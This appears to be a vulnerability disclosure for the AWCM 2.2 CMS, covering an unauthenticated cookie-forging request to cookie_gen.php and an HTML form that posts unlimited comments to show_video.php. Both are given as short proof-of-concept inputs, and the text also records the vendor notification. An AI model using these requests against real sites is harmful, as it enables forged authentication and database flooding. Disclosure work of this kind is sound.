AWCM 2.2 Access Bypass

`Vulnerability Report AWCM 2.2  
  
CVE-Candidate-ID: CVE-2012-2437, CVE-2012-2438  
Issue: Access Control Bug in AWCM 2.2, Anyone can build the cookie and inserts  
DB records.  
Author: Sooel Son [sonpostman (at) gmail (dot) com]  
Source Code: http://sourceforge.net/projects/awcm/  
  
1. Details: CVE-2012-2437  
Without going through an authentication procedure, anyone can  
forge a cookie, the  
pairs of key and value.  
  
Proof of Concept Code: Initiate the following URL request.  
http://targethost/awcm/cookie_gen.php?name=\'key\'&content=\'value\'  
ex) http://targethost/awcm/cookie_gen.php?  
name=awcm_member&content=123456  
  
2. Details CVE-2012-2438  
There is no access control protection for adversaries to  
insert millions of  
comment records on the database on show_video.php and topic.php.  
  
Proof of Concept Code:  
[form action=\"http://targethost/awcm/show_video.php?coment=exploit\"  
method=\"post\"]  
[input type=\"hidden\" name=\"coment\" value=\'insert  
uninvited comments 2\' /]  
[input type=\"submit\" value=\"Submit\"]  
</form>  
  
##########################  
Vendor Notification  
* Nov 5th: Acknowledge the vendors, but no responses.  
`